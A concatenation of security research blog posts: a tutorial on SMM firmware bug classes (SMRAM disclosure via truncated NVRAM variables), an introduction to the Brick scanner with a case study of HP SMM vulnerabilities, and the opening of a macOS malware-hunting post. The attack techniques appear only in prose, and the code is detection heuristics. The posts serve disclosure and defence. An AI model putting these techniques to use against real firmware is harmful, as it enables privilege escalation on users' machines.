All the bug classes described so far were centered around hijacking the SMM execution flow and corrupting SMM memory. Yet another very important category of vulnerabilities revolves around disclosing the contents of SMRAM. It is a known fact that SMRAM cannot be read from outside of SMM, which is why it is sometimes used by the firmware to store secrets that must be kept hidden from the outside world. In addition to that, disclosing the contents of SMRAM can also help with the exploitation of other vulnerabilities that require accurate knowledge of the memory layout.

A common scenario for SMRAM disclosure happens when SMM code tries to update the contents of an NVRAM variable. In UEFI, updating an NVRAM variable is not an atomic operation, but rather a composite one made out of the following steps:

  1. Allocating a stack buffer that will hold the data associated with the variable.
  2. Using the GetVariable() service to read the contents of the variable into the stack buffer.
  3. Performing all the required modifications on the stack buffer.
  4. Using the SetVariable() service to write the modified stack buffer back to NVRAM.
Figure 31 – UEFI code that demonstrates updating a UEFI variable. Source: TCGSmm

When calling GetVariable(), note that the 4th parameter is used as an input-output argument. Upon entry, this argument signifies the number of bytes the caller is interested in reading, while on return it is set to the number of bytes that were read from NVRAM in practice. In case the actual size of the variable matches the expected one, both values should be the same.

A problem arises when developers implicitly assume the size of a variable to be immutable. Due to this assumption, they completely ignore the number of bytes read by GetVariable() and just pass a hardcoded size to SetVariable() when writing the updated contents:

Figure 32 – the code above implicitly assumes the size of CpuSetup will always be 0x101A, so it doesn’t bother to check the number of bytes actually read by GetVariable()

Since the contents of some NVRAM variables (at least those that have the EFI_VARIABLE_RUNTIME_ACCESS attribute) can be modified from the operating system, they can be abused to trigger information disclosures in SMM while also serving simultaneously as the exfiltration channel. Let’s see how this can be done in practice.

First, the attacker would use an OS-provided API function such as SetFirmwareEnvironmentVariable() to truncate the variable, thus making it shorter than expected. Then, it will move on to trigger the vulnerable SMI handler. The SMI handler will:

  1. Allocate the stack-based buffer. Like any other stack-based allocation this buffer is uninitialized by default, meaning it holds leftovers from previous function calls that took place in SMM.
    Figure 33 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 1)
  2. Call the GetVariable() service to read the contents of the variable into the stack buffer. Normally, the size of the variable is equal to the size of the stack buffer, but since the attacker just truncated the variable in NVRAM, the buffer is surely longer. This in turn means it will continue to hold some uninitialized bytes even after GetVariable() returns.
    Figure 34 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 2)
  3. Modify the stack buffer in memory.
    Figure 35 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 3)
  4. Call the SetVariable() service to write back the modified stack buffer into NVRAM. Because this call is done using the hardcoded, constant size of the stack buffer, it will also write to NVRAM its uninitialized part.
    Figure 36 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 4)

To complete the process, the attacker can now use an API function such as GetFirmwareEnvironmentVariable() to fully disclose the contents of the variable, including the bytes that originate from the uninitialized portion.


The moral of this story is that NVRAM variables are not to be trusted blindly and should be taken into account when reasoning about the attack surface of the handler. If applicable, use compiler flags such as InitAll to make sure stack buffers will be zero-initialized. More tactically, when updating the contents of NVRAM variables the code must always take into account the actual size of the variable and not rely on a static, pre-computed value.

Yet another possible direction to mitigate these issues is to limit access to NVRAM variables. This can be done either by removing the EFI_VARIABLE_RUNTIME_ACCESS attribute entirely or using a protocol such as EDKII_VARIABLE_LOCK_PROTOCOL to make variables read-only.


It’s reasonable to assume that an NVRAM variable update operation will take place during the course of one function. That means we can usually ignore scenarios in which one function reads the variable and another one writes it. To locate these functions, after analyzing the input file with efiXplorer, navigate to the “services” tab and search for pairs of calls where SetVariable() is immediately followed by GetVariable():

Figure 37 – Searching for pairs of calls to GetVariable() and SetVariable()

For each such pair of calls, check that:

  1. Both calls originate from the same function
  2. Both calls operate on the same NVRAM variable
  3. The size argument passed to SetVariable() is an immediate value
Figure 38 – Simple heuristics to detect SMRAM info leaks

Identifying Library Functions

This post freely references library functions such as FreePool() and SmmIsBufferOutsideSmmValid() and naively assumes we can locate them without any hassle. The problem is these functions are statically linked to the binary, and normally SMM images are stripped of any debug symbols before being shipped to end-users. Due to that, locating them inside the IDA database is quite challenging.

During our work, we researched multiple approaches to tackle this problem, including automated diffing using Diaphora as well as experimentation with some lesser-known plugins such as rizzo and fingermatch. Eventually, we decided to stick to the KISS principle and perform the matching using plain and simple heuristics that take into consideration some of the unique characteristics of the target function. Below are some rules-of-thumb for matching the functions referenced earlier. Note that we assume the binary was already analyzed by efiXplorer, which makes things a bit easier.


Identifying FreePool() is pretty straightforward. All it takes is to scan the IDA database for a function that:

  • Receives one integer argument.
  • Conditionally, calls one of gBs->FreePool() or gSmst->FreePool() (but never both)
  • Forwards its input argument to both of these services
  • Figure 39 – Simple heuristic to pinpoint FreePool()


Identification of SmmIsBufferOutsideSmmValid() is a bit trickier. To successfully pull this off, we need to have some background information about a UEFI protocol called EFI_SMM_ACCESS2_PROTOCOL. This protocol is used to manage and query the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 40 – Interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exports a method called GetCapabilities(), which can be used by clients to figure out exactly where SMRAM lives in physical memory.

Figure 41 – Documentation of the GetCapabilities() function, source: Step to UEFI

Upon return, this function fills an array of EFI_SMRAM_DESCRIPTOR structures that tell the caller what regions of SMRAM are available, what is their size, state, etc.

Figure 42 – Output of a sample program that uses EFI_SMM_ACCESS2_PROTOCOL to query SMRAM ranges, source: Step to UEFI

In EDK2, the common practice is to store these EFI_SMRAM_DESCRIPTORS as global variables so that other functions could easily access them in the future. As you probably guessed, one of these functions is no other than SmmIsBufferOutsideSmmValid(), which iterates over the descriptors list to decide if the caller-provided buffer is safe:

Figure 43 – Source code for SmmIsBufferOutsideSmmValid, source: SmmMemLib.c

Taking this into consideration, our strategy to identify SmmIsBufferOutsideSmmValid() would be that of reverse lookup – first, we’ll find the global SMRAM descriptors initialized by EFI_SMM_ACCESS2_PROTOCOL and only then, based on the functions that use them, deduce who’s the most promising candidate to be SmmIsBufferOutsideSmmValid().

Technically, one can do so by following these simple steps:

  • Go to the “protocols” tab in efiXplorer and double click EFI_SMM_ACCESS2_PROTOCOL. This will cause IDA to jump to the location where this GUID is utilized (usually the call to LocateProtocol)
    Figure 44 – Searching for EFI_SMM_ACCESS2_PROTOCOL in IDA
  • Click on the protocol’s interface pointer (EfiSmmAccess2Protocol) and hit ‘x’ to search for its xrefs:
    Figure 45 – Listing the cross-references to EfiSmmAccess2Protocol
  • For each call to GetCapabilities(), check if the 3rd parameter (the SMRAM descriptor) is a global variable. If it is, do the following:
    • Hit ‘n’ to rename it according to some naming convention (say, SmramDescriptor_XXX, where XXX is an ordinal) to allow for easy reference in the future
    • Hit ‘y’ and set its variable type to EFI_SMRAM_DESCRIPTOR *

    Figure 46 – Renaming and setting the type for the SMRAM descriptors

  • Now check the following criteria for each function in the database.
    1. The function must receive two integer arguments
    2. The function must return a boolean value. From the perspective of the decompiler, boolean values are just plain integers, so to make this distinction we should go over all the return statements in the function and check that the returned value is a member of the set {0,1}.
    3. The function must reference one of the SMRAM descriptors that were marked in the previous step

If all three conditions are met, chances are the function you’re looking at is actually SmmIsBufferOutsideSmmValid():

Figure 47 – Locating SmmIsBufferOutsideSmmValid() in compiled SMM binaries using simple heuristics


Currently, efiXplorer does not support the definition of AMI_SMM_BUFFER_VALIDATION_PROTOCOL out of the box, so we must import the protocol definition separately.

Figure 48 – AMI_SMM_BUFFER_VALIDATION is not supported out of the box

To accomplish this, follow these steps:

  1. Download the protocol header file from GitHub and save it locally.
  2. Open an IDAPython prompt and run the following snippet:
    Figure 49 – Defining some C macros to enable importing the protocol header

    This is necessary because the header file makes use of several macros and typedefs that must be #defined manually before importing it.
  3. Navigate to the File->Import C header file menu to import the header.
    Figure 50 – Importing the header file
  4. Run again efiXplorer (hotkey: CTRL+ALT+E) and notice how the decompilation output suddenly changes:
    Figure 51 – AMI_SMM_BUFFER_VALIDATION is now recognized


“The more you look, the more you see.”
– Robert M. Pirsig,  Zen and the Art of Motorcycle Maintenance

Firmware-level attacks seem to pose a significant challenge to the security community. As part of the everlasting cat-and-mouse game between attackers and defenders, threat actors are starting to shift their spotlight to the firmware, considered by many the soft belly of the IT stack. In recent years, awareness of firmware threats is constantly increasing and some promising approaches are emerging to combat them:

  • Hardware vendors such as Intel, are constantly adding more security features to each new line of CPUs. The important advantage of these features is that they’re baked into the hardware and are capable of eliminating certain bug classes from the ground up (or at least make exploitation much harder). The downside with this approach is that due to the fragmented nature of the industry, not every feature that is supported by the hardware gets widespread adoption from the software side. While certain features such as Secure Boot, Boot Guard, and BIOS Guard are highly popular and can be found in the majority of commodity machines, other features such as STM (SMI Transfer Monitor, a technology which was intended to de-privilege SMM) were left as merely a PoC.
  • OS vendors such as Microsoft are collaborating intensely with leading OEMs to help bridge the gap between firmware security and OS security, a mandatory move given their long-term vision of harnessing virtualization to protect every Windows machine. The outcome of these endeavors is the line of Secured-Core PCs, which come preloaded with security features and configurations that are aimed at narrowing down the firmware attack surface as well as constricting the damage in case of an attack.
  • EDR vendors also contribute their part and are starting to tap into the firmware and provide visibility into the SPI flash memory and the EFI system partition. This approach is great for spotting IOCs of known firmware implants, but unfortunately is rather restricted when it comes to detecting the underlying vulnerabilities that enabled the infection in the first place.

Even in the face of these advancements, firmware security still bears lots and lots of issues, design flaws, and of course vulnerabilities to uncover. The ability of the security community to successfully pull this off depends on three fundamental pillars: knowledge, tooling, and diligence.

In this blog post, we were focused on promoting knowledge by shedding light on unfamiliar territory. In the next post, we’ll cover tooling and reveal:

  • How we automated the bug hunting process to the degree that finding SMM vulnerabilities is merely a matter of running a Python script
  • Some real-life examples of vulnerabilities we found, affecting most well-known OEMs in the industry.

As for diligence, unfortunately, no known recipe exists for producing such human qualities. It is, therefore, the responsibility of each and every one of us to just try our best and make sure that no stone is left unturned in this exciting and challenging domain.

Further Reading

Another Brick in the Wall: Uncovering SMM Vulnerabilities in HP Firmware

10 March 2022 at 13:00

By Assaf Carlsbad & Itai Liba

Executive Summary

  • SentinelLabs has discovered 6 high severity flaws in HP’s UEFI firmware impacting HP laptops and desktops.
  • Attackers may exploit these vulnerabilities to locally escalate to SMM privileges.
  • SentinelLabs findings were proactively reported to HP on Aug 18, 2021, and are tracked as:
    • CVE-2022-23956, marked with a CVSS score of 8.2
    • CVE-2022-23953, marked with a CVSS score of 7.9
    • CVE-2022-23954, marked with a CVSS score of 7.9
    • CVE-2022-23955, marked with a CVSS score of 7.9
    • CVE-2022-23957, marked with a CVSS score of 7.9
    • CVE-2022-23958, marked with a CVSS score of 7.9
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Hello and welcome back to yet another post in our blog post series covering UEFI & SMM security. This is the 6th (!) entry in the series, and it’s a good spot to pause for a second and look back to better estimate the vast distance we covered: from the baby steps of merely dumping and peeking at UEFI firmware, through the development of emulation infrastructure for it, and up to the point where we learned how to proactively hunt for SMM vulnerabilities. This post will continue where we left last time and will further explore SMM vulnerabilities, albeit from a slightly different angle.

So far, the SMM bug hunting methodology we came up with is mostly manual and goes roughly as follows:

  1. Obtain a UEFI firmware image of interest, either by dumping it from the SPI flash or, when possible, downloading it directly from the vendor’s website.
  2. Extract the encapsulated SMM binaries via tools such as UEFITool or UEFIExtract.
  3. Open the SMM images one by one in IDA and analyze them using efiXplorer, while keeping a keen eye for vulnerable code patterns like the ones described in the previous part.

Needless to say, this process is extremely slow, inaccurate, and cumbersome. After doing it repetitively over and over again, we were so unsatisfied with it that we decided to take the intuition and rules-of-thumb we developed and codify them into the form of an automated tool. The outcome of this endeavor is an IDA-based vulnerability scanner for SMM binaries we named Brick. For the benefit of the firmware security community, we decided to publish it as an open-source project that is readily available on GitHub.

In this post, we’ll introduce readers to Brick, its internal architecture, and its bug-hunting capabilities. Afterward, we’ll present a case study where we demonstrate how Brick was used to discover 6 different vulnerabilities affecting the firmware of some HP laptops. By doing so, we hope to encourage more people in the community to contribute back to Brick, as well as to educate the readers about the potential strengths (and weaknesses) of automated vulnerability hunting.

Enjoy the read!

Automated SMM Vulnerability Hunting Using Brick

As we said, Brick was developed to pinpoint certain vulnerabilities and anti-patterns inside SMM binaries. To effectively pull this off, its execution lifecycle is split into three different phases: harvest phase, analysis phase, and summary phase. Following is a detailed description of each phase.

Figure 1 – Schematic overview of Brick’s execution lifecycle

Harvest Phase

In the vast majority of cases, it’s most useful to give Brick a complete UEFI firmware image to scan. Doing so allows the researcher to “squeeze” the most vulnerabilities out of it while also gaining a bird-eye view of the code quality of the firmware as a whole. Alas, a typical UEFI firmware image is a complex beast that contains much more than SMM binaries. Among other things, it usually includes other stuff such as

  • Non-SMM executable modules for the different boot phases (PEI/DXE/etc.)
  • Microcode updates for the target CPU to be applied during early boot
  • Various Authenticated Code Modules (ACMs) signed by Intel, such as Boot Guard and BIOS Guard
  • A store for NVRAM variables
  • And much more
Figure 2 – SMM binaries are by no means the only file type stored inside a firmware image

Because of that, our first task is to separate the wheat from the chaff. In Brick’s terminology, this is accomplished by the harvest phase. During this phase, Brick will parse the firmware image and extract out of it just the SMM binaries we’re interested in.

To invoke Brick and kickstart the harvest phase, just pass the full path of the firmware’s image to the script:

Figure 3a – The harvest phase in action

Internally, the harvest phase is implemented by offloading most of the actual work to two external tools/libraries:

The reason we use two different solutions for this phase is that we encountered several cases where one of them struggled to properly parse a UEFI image, while the other succeeded without any hurdles. Thus, the strategy of using one of them and falling back to the other in case of failure gives us just the right amount of redundancy we need to successfully handle the vast majority of firmware images encountered in the wild.

At the end of the harvest phase — given that all went well — the output directory should contain several dozens of SMM binaries waiting for further examination.

Figure 3b – The output directory at the end of the harvest phase

Note that in addition to full UEFI firmware images, Brick also supports other input formats in case you want to limit bug hunting to a narrower scope. These include

  • A single executable file (e.g. foo.efi)
  • Directory that contains multiple SMM binaries
  • UEFI capsule update package
  • Various other options (see the source code for the complete list of supported options).

Analysis Phase

At this point, we have a directory filled with the SMM binaries we’re interested in analyzing. The rough idea was to open each SMM binary in IDA and — after the initial autoanalysis completes — run some custom IDAPython scripts on top of it to do the actual bug hunting. This must be done intelligently, as a naive solution for this problem would suffer from two severe downsides:

  1. Analyzing SMM binaries one at a time is not very efficient performance-wise. For this reason, we should strive at parallelizing the whole process while taking advantage of multiple CPU cores.
  2. IDA is mostly used in an interactive fashion, and while there exists a batch mode for non-interactive usage, it’s often overlooked as it’s not very convenient to use.

Luckily for us, it didn’t take us too long to bump into a project called idahunt that solves these exact two problems. Put in the author’s own words:

idahunt is a framework to analyze binaries with IDA Pro and hunt for things in IDA Pro. It is a command-line tool to analyze all executable files recursively from a given folder. It executes IDA in the background so you don’t have to manually open each file. It supports executing external IDA Python scripts.”

Figure 4 – Overview of using idahunt to speed up the scanning process

The IDAPython scripts executed by idahunt on behalf of Brick are known as Brick modules and come in three different flavors:

  • Processing modules, which are in charge of doing some initial preparatory work and handling some of the shenanigans of UEFI.
  • Hunting modules that employ a wide range of heuristics to pinpoint potential vulnerabilities. Usually, there exists a dedicated module for each of the vulnerability classes described earlier.
  • Informational modules emit valuable information about the target image that is not necessarily tied to vulnerabilities. This includes, for example, the list of unrecognized UEFI protocols consumed by the image.
Figure 5 – Overview of the various Brick modules

While developing these Brick modules, we found the raw IDAPython API to be a bit rough at times, so for the most part the modules were developed on top of a wrapper framework called Bip. One of the major highlights of this framework is that it also exposes wrapper functions for the Hex-Rays Decompiler API, which allows writing analysis routines in a fairly high-level notion.

Figure 6 – The analysis phase, running 8 concurrent IDA instances in the background

Summary Phase

After all SMM images in the input directory were scanned, Brick will move on to collect the output emitted by individual modules and merge them into a single, browsable HTML report.

Note that in addition to the scan’s verdict, the report file also includes links to some useful resources such as the annotated IDB file (necessary for validating the correctness of the results), the raw IDA log file (useful for troubleshooting and debugging), as well as a separate report file generated by efiXplorer.

Figure 7 – Portion of a Brick report produced for some firmware image

Case Study – Using Brick to Uncover HP Firmware Vulnerabilities

Throughout the past year, we were using Brick extensively to review various firmware images from almost all leading manufacturers in the industry. So far, this campaign is definitely paying off and has already given birth to no less than 13 different CVEs (see Appendix A). In this case study, we would like to put a spotlight on several such vulnerabilities found while auditing one particular firmware image from HP (version 01.04.01 Rev.A for HP ProBook 440 G8 Notebook). After Brick’s scan was completed, we opened the resulting report file and were faced with a rather intriguing entry:

Figure 8 – The SMM module 0155.efi does not validate certain nested pointers

This entry immediately drew our attention because, if confirmed correct, it means that the SMI handler installed by the SMM image 0155.efi does not validate certain pointers that are nested within its communication buffer. As we explained in the previous post, that in turn implies the handler can be exploited by attackers to corrupt or disclose the contents of SMRAM.

In this section, we’ll elaborate on how Brick managed to find such vulnerability in a completely automated fashion. For that, we’ll walk you through the internal workings of some Brick modules that were involved in making this verdict. Note that due to the medium of a written article, the case study will be presented using snapshots of the IDA database, before and after each module invocation. In reality, however, all modules will be executed automatically one after another, without any user interaction.


The first Brick module that is called to handle any input file is called the preprocessor. The preprocessor sets up the ground for the next modules in the chain and takes care of the following:

  • Making the .text section read-write, which prevents the decompiler from performing some excessive optimizations.
  • Discovering functions that the initial auto-analysis missed (based on codatify).
  • Scraping the edk2 and edk2-platforms repositories for protocol header files and attempting to import them into the IDA database. The net result is that the database is filled with a plethora of UEFI protocol definitions:
Figure 9 – Some UEFI protocols that were imported from EDK2 by the preprocessor


Right after the preprocessor, Brick moves on to load and run the efiXplorer plugin. As we mentioned countless times throughout the series, efiXplorer has tons of functionality and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming calls to UEFI boot/runtime services
  • Applying correct types for interface pointers
Figure 10 – Pseudocode from a decompiled function before efiXplorer was invoked
Figure 11 – The same function, after efiXplorer analysis

Last but not least, efiXplorer is also capable of locating and renaming SMI handlers. In its recent editions, it prefixes all CommBuffer-based SMIs with SmiHandler’, and all legacy software SMIs with ‘SwSmiHandler’. As can be seen, in the case of 0155.efi, only one SMI handler seems to exist:

Figure 12 – the SMI handler found by efiXplorer


Following efiXplorer, control is passed to the postprocessor. The postprocessor is a module that is in charge of completing the analysis performed earlier by efiXplorer. Among other things, this includes:

  • Locating SMI handlers that efiXplorer might have missed
  • Fixing the function prototype for some UEFI services such as GetVariable()/SetVariable()
  • Renaming function arguments

In the context of this case study, the most important feature of the postprocessor is the handling of calls to EFI_SMM_ACCESS2_PROTOCOL. In a nutshell, this protocol is used to control the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 13 – interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exposes a method called GetCapabilities(), which can be used by clients to query the memory controlled for the exact location of SMRAM in physical memory. Upon return, this function fills in an array of EFI_SMRAM_DESCRIPTOR structures that informs the caller what regions of SMRAM exist, what is their size, state (open vs. close), etc.

Figure 14 – documentation of the GetCapabilities() function, source: Step to UEFI

In EDK2 and its derived implementations, the common practice is to store these EFI_SMRAM_DESCRIPTORS as global variables so that they could be consumed by other functions in the future. As part of its operation, the postprocessor scans the input file for calls to GetCapabilities() and marks the SMRAM descriptors in a way that will make it easy to recover them afterward. This includes both retyping them as 'EFI_SMRAM_DESCRIPTOR *' as well as renaming them to have a unique, known prefix. The significance of this operation will be clarified shortly.

Figure 15 – Calling GetCapabilities(), before running the postprocessor
Figure 16 – Same code, after applying the postprocessor

Reconstructing the CommBuffer

Initially, the type assigned to the CommBuffer in the SMI handler’s signature is VOID *. This is adequate, as the structure of the CommBuffer is not known in advance and it’s the responsibility of the handler to correctly interpret it. Still, figuring out the internal layout of the Communication Buffer will be of great aid because it will let us know whether or not it contains nested pointers.

Usually, such tasks are completed manually as part of the reverse engineering process, but in Brick we needed to pull this off automatically. The two most prominent and successful IDA plugins for doing so are HexRaysPyTools and HexRaysCodeXplorer. Based on our experience, HexRaysPyTools produced more accurate results, while HexRaysCodeXplorer is better suited for non-interactive use. Eventually, the scriptability capabilities of HexRaysCodeXplorer tipped the scale in its favor and so it was incorporated into Brick.

Figure 17 – HexRaysCodeXplorer can be invoked from an IDAPython script

At this stage, all SMI handlers present in the image were already identified so Brick can iterate over them and invoke HexRaysCodeXplorer on the associated CommBuffer to reconstruct its internal structure. Doing so for the SMI handler from 0155.efi yields the following structure, which holds two members (field_18 and field_28) that are presumably pointers by themselves:

Figure 18 – the reconstructed structure of the Comm Buffer

How did HexRaysCodeXplorer get to this conclusion? To answer this question, let’s take a closer look at the handler’s code itself:

Figure 19 – The SMI handler forwards CommBuffer->field_18 to sub_17AC

As can be seen, during the course of its operation, the handler passes CommBuffer->field_18 as the 2nd argument to the function sub_17AC. This function, in turn, forwards it to CopyMem(), where it is used as the destination buffer. Based on the signature of CopyMem(), we know the destination buffer is in fact a pointer. That means the argument for sub_17AC is also a pointer by itself and therefore — due to the transitivity of assignments — CommBuffer->field_18 must be a pointer as well! The same logic also applied to field_28, even though we won’t show it here.

Figure 20 – The 2nd argument is forwarded as the destination buffer for CopyMem()

Resolving SmmIsBufferOutsideSmmValid

Now that it knows the CommBuffer does contain some nested pointers, Brick moves on and checks if these pointers are being sanitized properly. That is a two-fold operation:

  1. Locating the function SmmIsBufferOutsideSmmValid() in the input binary.
  2. If found, check that it is aptly used to sanitize the nested pointers.

Let’s start with resolving SmmIsBufferOutsideSmmValid(). As we mentioned in the previous part, SmmIsBufferOutsideSmmValid() is statically linked to the binary and thus locating it is not a trivial problem. To pull this off, we compiled a heuristic comprised of three conditions. Brick will iterate over all of the functions in the IDA database and try to find a function that matches all three. The heuristic goes as follows:

  1. The function at hand must receive two integer arguments – the first used as the buffer’s address and the second as its size. With the help of Bip’s API, checking for these properties is rather trivial:
    def check_arguments(f: BipFunction):
        # The arguments of the function must match (EFI_PHYSICAL_ADDRESS, UINT64)
        if (f.type.nb_args == 2 and \
            isinstance(f.type.get_arg_type(0), BTypeInt) and \
            isinstance(f.type.get_arg_type(1), BTypeInt)):
            return True
            return False

    Figure 21 – Matching the arguments of SmmIsbufferOutsideSmmValid

  2. The function at hand must return a BOOLEAN value. From the perspective of the decompiler, BOOLEAN values are just plain integers, so if we want to make this distinction we must go over all the return statements in the function and check if the returned value is a member of the set {0,1}. In Bip, this can also be accomplished very easily:
    def check_return_type(f: BipFunction):
        if not isinstance(f.type.return_type, BTypeInt):
            # Return type is not something derived from an integer.
            return False
        def inspect_return(node: CNodeStmtReturn):
            if not isinstance(node.ret_val, CNodeExprNum) or node.ret_val.value not in (0, 1):
                # Not a boolean value.
                return False
        # Run 'inspect_return' on all return statements in the function.
        return f.hxcfunc.visit_cnode_filterlist(inspect_return, [CNodeStmtReturn])

    Figure 22 – Checking the function actually returns a BOOLEAN value

  3. Lastly, we know that SmmIsBufferOutsideSmmValid() uses an array of EFI_SMRAM_DESCRIPTORS to keep track of active SMRAM ranges, so we expect the candidate function to reference at least one of them. Because global EFI_SMRAM_DESCRIPTORS were already marked earlier by the postprocessor, checking for xrefs between the function and the descriptors becomes straightforward:
    def references_smram_descriptor(f: BipFunction):
        # The function must reference at least one SMRAM descriptor.
        for smram_descriptor in BipElt.get_by_prefix('gSmramDescriptor'):
            if f in smram_descriptor.xFuncTo:
                return True
            # No xref to SMRAM descriptor.
            return False

    Figure 23 – Checking the function references an EFI_SMRAM_DESCRIPTOR

Are these heuristics bulletproof and guarantee they will always match SmmIsBufferOutsideSmmValid() in the binary? Of course not! But more often than not they do the trick, and that’s what matters. In the HP case, the heuristics didn’t fail and managed to find a proper match:

Figure 24 – Matching SmmIsBufferOutsideSmmValid()

Nested Pointers Validation

Once SmmIsBufferOutsideSmmValid() is matched, Brick verifies it is being used properly by the SMI handler. For that, it iterates over all calls to SmmIsBufferOutsideSmmValid() and tries to deduce if all nested pointers are being covered by it. In 0155.efi, it notices there is only one call to SmmIsBufferOutsideSmmValid() that is used to validate field_28. That implies no validation takes place over the second nested pointer, namely field_18, so it flags the handler as vulnerable.

Figure 25 – SmmIsBufferOutsideSmmValid validates one field while neglecting the other one

To be fair, we were quite lucky to encounter such a clear-cut case as the one above. If the control flow was a bit more convoluted, there is a decent chance Brick’s verdict would become more ambiguous.


We already saw that depending on the exact flow the handler takes, it might end up calling sub_17AC. This function gets an argument that is derived from CommBuffer->field_18 and will later forward it as the destination address for CopyMem(). The contents of the CommBuffer are fully controllable by the attacker and, leveraging the missing validation, he or she can craft a buffer whose field_18 points to an arbitrary SMRAM address of their choice. As a result, the SMRAM region pointed to by that address will get corrupted by the time CopyMem() gets called.

Figure 26 - CommBuffer->field18 is passed from SmiHandler through sub_17AC and ends up at CopyMem
Figure 26 – CommBuffer->field18 is passed from SmiHandler through sub_17AC and ends up at CopyMem

How to cause the handler to actually call sub_17AC, and how to promote this memory corruption into an arbitrary code execution in SMM are left as exercises to the diligent reader.

Low SMRAM Corruption

In addition to the nested pointer vulnerability present in 0155.efi, the HP firmware image also suffered from 5 additional, less severe issues that enable attackers to corrupt the low portion of SMRAM. All five vulnerabilities are isomorphic to each other, so we’ll focus on the simplest case found in 017D.efi:

Figure 27 – Low SMRAM corruption discovered in 017D.efi

As we mentioned in the previous post, these vulnerabilities arise when an SMI handler writes data to the communication buffer without first validating its size. Attackers can place the CommBuffer just below SMRAM, which will cause unintended corruption once the handler performs the write to it.

We also noted that SMI handlers can shield themselves from these problems by performing one or both of the following actions:

  1. Calling SmmIsBufferOutsideSmmValid on the CommBuffer with the exact size expected by the handler.
  2. Dereferencing the provided CommBufferSize argument (a pointer to an integer value holding the size of the buffer), then comparing the result against the expected size.

Therefore, to detect this class of vulnerabilities, Brick searches for SMI handlers that omit both checks. Unlike the previous case, this time the heuristics employed to resolve SmmIsBufferOutsideSmmValid() bore no fruit, so Brick simply assumes it’s absent from the binary and moves on to check if CommBufferSize is being dereferenced. This is achieved by traversing the AST associated with the handler, looking for nodes that correspond to a dereference operation (cot_ptr in the Hex-Rays terminology). The child node of a dereference operation in the tree represents the variable being dereferenced, so Brick can check if it’s CommBufferSize.

Figure 28 – The portion of the AST that corresponds to dereferencing CommBufferSizejust above

If such a pair of nodes is found, it tells us that the C source code for the handler contained the expression: *CommBufferSize, so we can assume the programmer intended to compare that value against some anticipated size.

Figure 29 – The corresponding C source code for the dereference operator

Using Bip, implementing this heuristic is easy and only takes a handful of Python lines:

def dereferences_CommBufferSize(handler: BipFunction):
    # CommBufferSize is the 3rd argument of the SMI handler
    CommBufferSize = handler.hxcfunc.args[2]
    if not CommBufferSize._lvar.used:
        # CommBufferSize is not touched at all.
        return False
    def inspect_dereference(node: CNodeExprPtr):
        child = node.ops[0].ignore_cast
        if isinstance(child, CNodeExprVar) and child.lvar == CommBufferSize:
            # This is confusing, we return False just to signal the search to stop.
            return False
    # Run 'insepct_dereference' on all dereference expressions in the function.
    return not handler.hxcfunc.visit_cnode_filterlist(inspect_dereference, [CNodeExprPtr])

Figure 29 – Implementing the heuristic in python

Unfortunately, this heuristic yields no results, so Brick now knows CommBufferSize is not being dereferenced and as a result marks the handler as vulnerable.

Figure 31 - Brick’s assessment of 017D.efi
Figure 30 – Brick’s assessment of 017D.efi


As can be judged by the number of CVEs it has already generated, we believe Brick is a very promising project that takes a big step in the right direction of harnessing automation to streamline the bug hunting process. This feeling we have was even reinforced recently when a related project called FwHunt was released. FwHunt attempts to solve the same set of problems as Brick, only using strict rule-sets rather than more relaxed heuristics.

Using automation, rules, heuristics, and other static code analysis techniques to crack through complex problems are very much desirable, but it’s always important to remember that reality is more complex than how we describe it. As such, occasional edge conditions that cause Brick and other automated tools to generate false positives and false negatives from time to time are inevitable.

That is perfectly acceptable, as long as we keep in mind that these tools were never intended to fully replace a human analyst, but rather empower him to handle larger and larger quantities of data. Eventually, it’s not the tool itself that makes the difference, but rather the human being that chooses how to use it, on what targets, and how to interpret its findings.

If you’re interested in learning more about the subject, come attend the upcoming Insomnihack conference, where we will be delivering a talk about some more SMM vulnerabilities, found this time in the Intel codebase.

See you there!

Appendix A – List of CVEs by Brick

CVE ID CVSS score Vendor
CVE-2021-36342 7.5 Dell
CVE-2021-44346 ? Gigabyte
CVE-2021-0157 8.2 Intel
CVE-2021-0158 8.2 Intel
CVE-2021-42055 6.8 ASUS
CVE-2021-3599 6.7 Lenovo
CVE-2021-3786 5.5 Lenovo
CVE-2022-23956 8.2 HP
CVE-2022-23953 7.9 HP
CVE-2022-23954 7.9 HP
CVE-2022-23955 7.9 HP
CVE-2022-23957 7.9 HP
CVE-2022-23958 7.9 HP

Appendix B – References and Further Reading

The Art and Science of macOS Malware Hunting with radare2 | Leveraging Xrefs, YARA and Zignatures

21 March 2022 at 16:24

Welcome back to our series on macOS reversing. Last time out, we took a look at challenges around string decryption, following on from our earlier posts about beating malware anti-analysis techniques and rapid triage of Mac malware with radare2. In this fourth post in the series, we tackle several related challenges that every malware hunter faces: you have a sample, you know it’s malicious, but

  • How do you determine if it’s a variant of other known malware?
  • If it is unknown, how do you hunt for other samples like it?
  • How do you write robust detection rules that survive malware author’s refactoring and recompilation?

The answer to those challenges is part Art and part Science: a mixture of practice, intuition and occasionally luck(!) blended with a solid understanding of the tools at your disposal. In this post, we’ll get into the tools and techniques, offer you tips to guide your practice, and encourage you to gain experience (which, in turn, will help you make your own luck) through a series of related examples.

As always, you’re going to need a few things to follow along, with the second and third items in this list installed in the first.

  1. An isolated VM – see instructions here for how to get set up
  2. Some samples – see Samples Used below
  3. Latest version of r2 – see the github repo here.

What are Zignatures and Why Are They Useful?

By now you might have wondered more than once if this post just had a really obvious typo: Zignatures, not signatures? No, you read that right the first time! Zignatures are r2’s own format for creating and matching function signatures. We can use them to see if a sample contains a function or functions that are similar to other functions we found in other malware. Similarly, Zignatures can help analysts identify commonly re-used library code, encryption algorithms and deobfuscation routines, saving us lots of reversing time down the road (for readers familiar with IDA Pro or Ghidra, think F.L.I.R.T or Function ID).

